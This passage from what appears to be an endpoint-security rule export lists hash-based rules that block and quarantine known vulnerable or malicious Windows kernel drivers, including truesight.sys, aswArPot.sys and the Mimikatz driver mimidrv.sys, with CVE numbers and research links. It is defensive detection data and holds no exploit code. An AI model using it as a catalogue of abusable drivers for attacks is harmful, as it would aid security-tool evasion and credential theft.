kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "277a237b-3f4b-5db9-8a7f-9962a2c1005d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973217Z", + "creation_date": "2026-03-23T11:45:29.973219Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973224Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8907c476440abdd7f71feb068443a7c9736aa6bf625dfb8b6931c46341aa4abf", + "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "27b4489c-d4a0-55cd-a711-fe94c9f09d18", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828137Z", + "creation_date": "2026-03-23T11:45:30.828139Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828145Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5c31418c493f33151a86bca000d364ef472a07650f87cbf02cdb1ed9915a9e6f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "27b74b27-493b-51ce-b86c-aa0aea168ea0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.478863Z", + "creation_date": "2026-03-23T11:45:31.478866Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.478891Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "04bcb3a05961381a4e28a05901a21c6ce15437e59482db083b4e46dfc666722e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "27cf7ff6-ac99-5286-a09d-b03de2c32282", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970228Z", + "creation_date": "2026-03-23T11:45:29.970230Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970235Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5eb493fc07a9573176f87297a002183d8e60104619a7b83940ce6e83ac54cd7b", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "27d19d51-37fe-55b8-ac03-a67ae9b674c7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807330Z", + "creation_date": "2026-03-23T11:45:31.807333Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807339Z", + "rule_level": 
null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7de59866f3420467502e2bf8cab8171c9fc259f7380cb5a2c7d833d16d1e2edf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "27d749a8-0ed6-54a9-b581-dd5b7acb6f91", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454211Z", + "creation_date": "2026-03-23T11:45:30.454214Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454224Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "752b31418053dc19c0573d16953d5ad24723bd57e5f62eff391e632548855b5f", + "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/bc5e020a-ecff-43c8-b57b-ee17b5f65b21/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "27ecaede-842f-5c3b-9c7d-228ae9641950", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829845Z", + "creation_date": "2026-03-23T11:45:30.829847Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829852Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7abb86c7ad13581e0cb1be79bb579efe786f1253a3fcaf6fae7607fe09bc34dc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "27f6ea07-4a09-5975-bf08-315e635e44da", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613065Z", + "creation_date": "2026-03-23T11:45:29.613067Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613072Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"b4d47ea790920a4531e3df5a4b4b0721b7fea6b49a35679f0652f1e590422602", + "comment": "ASUS vulnerable UEFI Update Driver (aka AsUpIO64.sys and GVCIDrv64.sys) [https://codeinsecurity.wordpress.com/2016/06/12/asus-uefi-update-driver-physical-memory-readwrite/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "280076a1-ae2a-5916-9aca-916ed89c5618", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817634Z", + "creation_date": "2026-03-23T11:45:31.817637Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817646Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a040bd51630fb46f624f359ea7cd6fe929816563f927f16ff125e23b1e2917bb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2806f6bb-58d0-5a3b-b9cc-70d097149010", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500362Z", + "creation_date": "2026-03-23T11:45:31.500365Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500374Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dc876fa85717a697e284839410f09ee617bdfe62a75f9ca523ca6545093ab360", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "280ddff5-ef75-5484-8a3d-2fca7695d64f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470251Z", + "creation_date": "2026-03-23T11:45:30.470254Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470264Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7adc0785210452664cb684b2c7687589090d31f2a3d0892e8e520145c0799110", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) 
[https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "280eca09-6c68-534c-a356-ba5178908770", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974315Z", + "creation_date": "2026-03-23T11:45:29.974317Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974323Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eb14c5db8307488809897be13c66ef02941f6020f9c34a9664db92a00d551f4a", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "28129e27-5790-5199-8968-7ebf1df0e7d5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827658Z", + "creation_date": 
"2026-03-23T11:45:31.827660Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827666Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "accd4f23f1b4ec1e16b5107fa7d59eefa1e901c38c1947afe4e132280710f539", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2824d10a-1f6b-533b-8757-6fad13e866e9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832782Z", + "creation_date": "2026-03-23T11:45:30.832783Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832789Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d42a4554c469020a44eb69cd4ec99bcddb093193a7b75127f82fe2785581dbb9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "282df111-e5d7-50de-8a7e-8045a55ae115", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479241Z", + "creation_date": "2026-03-23T11:45:30.479243Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479249Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2fb5d7e6db01c9090bba92abf580d38993e02ce9357e08fe1f224a9b18056e5a", + "comment": "Vulnerable Kernel Driver (aka directio32_legacy.sys) [https://www.loldrivers.io/drivers/7a0842ca-1a64-4ad1-9d66-25eb983d1742/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "28371d22-67e8-575e-b9bc-35dd9cea87f6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827640Z", + "creation_date": "2026-03-23T11:45:31.827642Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.827648Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d05c17f5dc4ea2fe3f5bcca774e83fe8b521d1e6fad60ee5178810c40bd10cb1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "28382674-0187-598e-a00a-6f2270ed0c9c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615169Z", + "creation_date": "2026-03-23T11:45:29.615171Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615176Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4a05ad47cd63932b3df2d0f1f42617321729772211bec651fe061140d3e75957", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "283e5bca-9901-5e4b-964e-c78cc7c5b22c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829696Z", + "creation_date": "2026-03-23T11:45:30.829698Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829704Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "06ca3298bf7b70f797198adc31108fe95126fb37b12021e3e00390f60bb7181b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2842e846-f175-5aa4-a969-032d3b8f4e04", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140094Z", + "creation_date": "2026-03-23T11:45:31.140096Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140102Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], 
+ "type": "hash", + "value": "34246ad7d90163e21633a7f76bc9709332a1b67e3263151263fc9f5f853891f4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "284688e5-29cd-594b-bc06-976b650c452a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606438Z", + "creation_date": "2026-03-23T11:45:29.606440Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606446Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "703b4ec0a36c18af294f5db9e0acf73edec524515f75856bb8da7a98b4e26910", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "284b1cab-cbce-5dc2-9b80-1869174a4d2a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157548Z", + "creation_date": "2026-03-23T11:45:31.157550Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157557Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7154523cf44a211b4b39b7e24f37368e83a67ef90fdc1b9553e0d850f0d08509", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "284d0c81-9673-548d-8e49-58b9a7834e51", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613012Z", + "creation_date": "2026-03-23T11:45:29.613014Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613019Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b0ed869a98c4cc2fc84deacb91ab87ca7657f0aea3e1c23234263e99237712fb", + "comment": "Marvin Test Solutions HW vulnerable driver (aka Hw.sys and Hw64.sys) 
[https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "285393c7-3974-5188-a0e0-4cd0b01b85d2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487594Z", + "creation_date": "2026-03-23T11:45:31.487596Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487602Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0154a13245c9b2ce43c31de3c78e49d3d9de3fac1bed848520aae9d423d822e7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "285c71f4-484f-57f8-a139-754d50d9ab91", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473912Z", + 
"creation_date": "2026-03-23T11:45:31.473915Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.473926Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "47e95a501379d5f835eef82a9fd7ed0e80a04a7a780e9bac73830965a89d5302", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "286359cf-919a-5ac3-9a9d-55d98db458c3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835789Z", + 